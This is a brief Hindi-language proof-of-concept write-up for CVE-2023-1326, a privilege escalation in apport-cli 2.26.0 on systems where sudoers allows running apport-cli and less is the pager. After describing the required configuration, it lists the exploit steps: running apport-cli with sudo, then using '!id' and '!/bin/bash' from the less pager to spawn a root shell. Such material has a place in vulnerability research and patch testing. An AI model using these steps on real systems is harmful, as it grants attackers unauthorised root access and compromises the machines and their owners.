
CVE-2023-1326 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो apport-cli 2.26.0 में sudo और less को पेजर के रूप में कॉन्फ़िगर करने पर एक विशेषाधिकार वृद्धि (privilege escalation) भेद्यता है।
CVE-2023–1326 के लिए apport-cli 2.26.0 में एक अवधारणा प्रमाण
यह भेद्यता apport-cli 2.26.0 में विशेषाधिकार वृद्धि है, जो CVE-2023–26604 के समान है, यह भेद्यता केवल तभी काम करती है जब sudoers में निर्दिष्ट किया गया हो:

विशेषाधिकार वृद्धि का हमला apport-cli 2.26.0 और पुराने संस्करणों में पाया गया जो CVE-2023-26604 के समान है। यदि किसी सिस्टम को विशेष रूप से कॉन्फ़िगर किया गया है ताकि अनधिकृत उपयोगकर्ता sudo apport-cli चला सकें, less को पेजर के रूप में कॉन्फ़िगर किया गया है, और टर्मिनल आकार सेट किया जा सकता है: एक स्थानीय हमलावर विशेषाधिकार बढ़ा सकता है।
sudo /usr/bin/apport-cli -f



!id
!/bin/bash
